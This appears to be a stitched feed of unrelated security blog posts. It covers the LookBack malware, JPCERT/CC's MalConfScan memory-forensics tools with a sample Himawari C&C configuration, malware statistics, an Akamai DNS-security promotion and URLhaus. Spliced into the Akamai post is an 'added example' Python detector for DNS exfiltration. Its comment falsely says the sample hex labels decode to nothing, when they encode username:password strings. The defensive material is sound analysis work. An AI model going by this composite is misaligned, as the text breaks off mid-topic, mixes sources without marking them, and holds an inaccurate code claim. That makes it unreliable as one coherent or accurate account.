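Rule 1 is the durable one: OriginalFileName comes from the binary's version resource, so renaming certutil.exe does not evade it, whereas rule 3 only catches this campaign's chosen name.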

Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.

Webinar: How to Detect LookBack Malware
Tuesday, August 16th, 2019, 9:00 AM PDT

Related Links

Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed

The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. Malware configuration contains various kinds of information that provide many clues for incident handling, for example details of communication with other hosts and the techniques the malware uses to persist. This time, we introduce a plugin, “MalConfScan with Cuckoo”, that automatically extracts malware configuration using MalConfScan (see the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download from the webpage below:

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, an open-source sandbox system for dynamic malware analysis. Adding this plugin to Cuckoo makes MalConfScan run as part of each Cuckoo analysis, enabling automatic extraction of malware configuration. Figure 1 shows how Cuckoo behaves with “MalConfScan with Cuckoo” installed.

Figure 1: Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs the malware in the Cuckoo analysis guest to extract its configuration. When a sample is submitted to Cuckoo and executed in the guest, a memory image is dumped, and MalConfScan extracts the configuration of known malware from that image. The extracted configuration is then shown in the report. See the previous article or the following page for the list of malware that this tool supports.

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan/

Instruction and report example

First, submit the malware to a Cuckoo instance that has “MalConfScan with Cuckoo” installed, using the web GUI or the command line. The official Cuckoo documentation [1] provides details of the submission procedure. When the upload and analysis are complete, a report such as the one in Figure 2 is produced.

Figure 2: Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of Himawari, a RedLeaves variant used in targeted attacks. It is a kind of bot, and its configuration contains the C&C servers, destination port, protocol, encryption key and so on. In this way, “MalConfScan with Cuckoo” can easily extract the configuration of known malware.
The results are also available in JSON format; report.json records the following data:

"malconfscan": {
    "data": [
        {
            "malconf": [
                [
                    {"Server1": "diamond.ninth.biz"},
                    {"Server2": "diamond.ninth.biz"},
                    {"Server3": "diamond.ninth.biz"},
                    {"Server4": "diamond.ninth.biz"},
                    {"Port": "443"},
                    {"Mode": "TCP and HTTP"},
                    {"ID": "2017-11-28-MACRO"},
                    {"Mutex": "Q34894iq"},
                    {"Key": "usotsuki"},
                    {"UserAgent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)"},
                    {"Proxy server": ""},
                    {"Proxy username": ""},
                    {"Proxy password": ""}
                ]
            ],
            "vad_base_addr": "0x04521984",
            "process_name": "iexplore.exe",
            "process_id": "2248",
            "malware_name": "Himawari",
            "size": "0x00815104"
        }
    ]
}

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on the GitHub:

   MalConfScan-with-Cuckoo Wiki – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo/wiki

The tool has been tested in the following environment:

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

   Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium
   https://medium.com/@soji256/build-a-malconfscan-with-cuckoo-environment-to-analyze-emotet-ff0c4c589afe

In closing

This plugin makes it possible to extract the configuration of known malware from a sandbox run. Even where the malware has anti-VM or anti-sandbox functions, the configuration can often still be extracted by spoofing some of the environment information the malware checks.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the upcoming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Black Hat USA 2019; we look forward to active discussion and feedback from analysts.

Tomoaki Tani (Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis https://cuckoo.sh/docs/usage/submit.html

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese] https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019 https://www.blackhat.com/us-19/arsenal/schedule/index.html#malconfscan-with-cuckoo-automatic-malware-configuration-data-extraction-and-memory-forensic-16914

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware: they share most of the code, and differ only slightly in configuration, such as the C&C servers. This means that, in such cases, extracting the configuration from the malware covers most of the analysis work.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub https://github.com/JPCERTCC/MalConfScan

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub https://github.com/JPCERTCC/MalConfScan/wiki

About MalConfScan

MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensics tool. In most cases, malware analysis begins with unpacking the malware in order to extract its configuration. MalConfScan instead extracts the configuration from the unpacked executable as it sits in memory.
MalConfScan provides the following two functions:

malconfscan: Extract the configuration of known malware from a memory image
malstrscan: Detect suspicious processes in a memory image and list the strings they refer to

malconfscan

Figure 1 is an example of malconfscan execution. First, the name of the process the malware was injected into (Name), its process ID (PID) and the name of the detected malware (Malware Name) are displayed, followed by the malware configuration (Config info).

Figure 1: malconfscan execution result (Detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 shows the result where malconfscan detected Bebloh; the DGA domains are listed after the configuration.

Figure 2: malconfscan execution result (Detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.

malstrscan

malstrscan detects process hollowing in memory and lists the strings that the hollowed process refers to. Although malware configuration is usually stored encoded, the malware decodes it when it needs the information, and the decoded copy is sometimes left behind in memory. This function can pick up such leftover configuration. Figure 3 is an example of malstrscan execution.

Figure 3: malstrscan execution results

By default, malstrscan lists strings only from the memory region where the PE file is loaded. With the -a option, it also lists strings from the heap and the other regions of the process's memory.

In closing

MalConfScan can be used for both malware analysis and memory forensics. We hope that this tool helps with incident investigation. We plan to update it in the future to support many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware (25 families)
Ursnif, HawkEye Keylogger, Emotet, Lokibot, Smoke Loader, Bebloh, Poison Ivy, AZORult, CobaltStrike, NanoCore RAT, NetWire, AgentTesla, PlugX, FormBook, RedLeaves, NodeRAT, TSCookie, njRAT, TSC_Loader, TrickBot, xxmm, Remcos, Datper, QuasarRAT, Ramnit

The list of malware variants identified in June shows a return of WannaCry and Tinba activity.

The trend is still that the ten most frequently identified variants account for more than 60 percent of all malware identifications.

The distribution of the most frequently occurring malware names for June 2019 looks as follows:

Security researchers on Palo Alto Networks' Unit 42 team have discovered the macOS malware CookieMiner, designed to steal the cookies associated with cryptocurrency exchange websites.

There are two types of companies: those who have been hacked, and those who don't yet know they have been hacked. [1]

With data breaches frequently making the news and causing panic among network administrators, the above statement, made by former Cisco boss John Chambers in 2015, certainly doesn't seem far-fetched. I don't remember a week going by in 2018 when I wasn't learning of a data breach and how sophisticated the attack was. Well, except for the time I had no internet access while visiting the Salt Cathedral of Zipaquirá and couldn't understand why. Then there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far-reaching and include both the tangible and the intangible. It should come as no surprise that information security is the top concern of CISOs and CIOs. Some of their companies are embracing cloud-native initiatives that have improved organizational agility, reduced products' time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, raising concern over whether they can secure their cloud environment as adequately as they would their traditional network.

These concerns are well founded. The traditional network security solutions used to combat the current cyber-crime wave have only increased complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices (human-controlled and otherwise) as part of ransomware campaigns, to steal sensitive data, or for other criminal activities.

It's far more important to keep an eye on what's traveling out of the network... Today, malicious actors aren't interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag. [2]

We should keep the statement above by John Kindervag in mind and add to our focus ways to prevent any data exfiltration to unauthorized destinations. Companies have typically leveraged endpoint solutions, in addition to other network elements, to protect against the malware used for that purpose. However, to combat today's cyber-criminals, companies need a defense-in-depth security strategy in which every network layer used to access data is secured, and that includes the DNS layer. DNS is an often overlooked layer for security, yet it is integral to network functionality: it is the protocol we use to locate resources on a network. We use it to reach our favorite news and social media sites, to access printers and storage devices, to reach the security cameras in the data center, and even to send email. It is also what unsuspecting victims use to reach the phishing websites from which malware is downloaded, and what malware uses to locate its control servers on the internet. Those servers can be the destination for data stolen from digital assets inside the company (exfiltrated, in some cases, over the DNS protocol itself), and they can serve the keys used to encrypt digital assets in a ransomware attack.

It is therefore both wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS-layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off the network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.
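As an added example (not Akamai's code and not part of the original post) of the kind of DNS-layer check the paragraphs above argue for, the Python below scores a constructed recursive-resolver query log for the DNS-based data exfiltration they mention: subdomain labels that are unusually long or high-entropy, repeated by one client against one base domain. The query log, the thresholds, and the two-label approximation of the base domain (a real deployment would use a public-suffix list) are assumptions of this example.

```python
import math
from collections import defaultdict

# Constructed resolver query log as (client_ip, qname) pairs; not real traffic.
# 10.0.0.7 is made to look like a host pushing data out through subdomain labels:
# the long hex-looking chunks are made up for the example and do not decode to anything.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "mail.example.com"),
    ("10.0.0.5", "cdn.static.example.net"),
    ("10.0.0.7", "www.example.com"),
    ("10.0.0.7", "6a6f686e2e646f653a7030405373773072642131.0001.c2-updates.example"),
    ("10.0.0.7", "616c6963652e736d6974683a68756e74657232.0002.c2-updates.example"),
    ("10.0.0.7", "626f622e6c65653a73756d6d657232303139.0003.c2-updates.example"),
    ("10.0.0.7", "636172613a313233343536373839306162.0004.c2-updates.example"),
    ("10.0.0.7", "64616e3a72656374616e676c652d38353039.0005.c2-updates.example"),
    ("10.0.0.7", "65726963613a70617373776f7264313233.0006.c2-updates.example"),
]


def shannon_entropy(s):
    """Bits per character: ~4.0 for random hex, ~5.2 for random base64, below 3 for words."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain_labels, base_domain); base domain approximated as the last two labels."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) <= 2:
        return [], ".".join(labels)
    return labels[:-2], ".".join(labels[-2:])


def looks_encoded(labels, max_label=20, min_entropy=3.5):
    """True when the subdomain part carries an unusually long or high-entropy label."""
    if not labels:
        return False
    longest = max(labels, key=len)
    return len(longest) > max_label or shannon_entropy(longest) >= min_entropy


def find_tunnel_candidates(queries, min_suspicious=5):
    """{(client, base_domain): count} for pairs with at least min_suspicious encoded-looking queries.

    Counting per client and base domain, rather than flagging single queries, keeps one odd
    CDN hostname from raising an alert while a sustained stream to one domain still does.
    """
    suspicious = defaultdict(int)
    for client, qname in queries:
        subs, base = split_name(qname)
        if looks_encoded(subs):
            suspicious[(client, base)] += 1
    return {k: v for k, v in suspicious.items() if v >= min_suspicious}


if __name__ == "__main__":
    for (client, base), count in find_tunnel_candidates(SAMPLE_QUERIES).items():
        print(f"{client} -> {base}: {count} encoded-looking queries")
```

Real tunnels also show up as high query volume and unusual record types (TXT, NULL), which a resolver-side control can add to the same per-client, per-domain counter.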


These are the drivers behind the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway: advanced threat protection in the cloud for all your users, everywhere, acting as a safe on-ramp to the internet. ETP uses multiple layers of protection (DNS, URL and inline payload analysis) to provide security with reduced complexity and without impacting performance. Companies simply direct their recursive DNS traffic to Enterprise Threat Protector's global servers, where every requested domain is checked against Akamai's real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine whether they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real time using multiple advanced malware-detection engines.

ETP improves security defenses, reduces security complexity and increases the efficiency of security teams. Find out more here.

In March 2018, the URLhaus project was launched by abuse.ch, a non-profit cyber-security organization based in Switzerland.

The purpose of URLhaus is to collect URLs of sites that distribute malware, and after ten months of work the collaboration has now taken down no fewer than 100,000 such sites.

256 security researchers, spread across the whole world, report malware sites to URLhaus every day, and in that way help protect internet users against malware campaigns.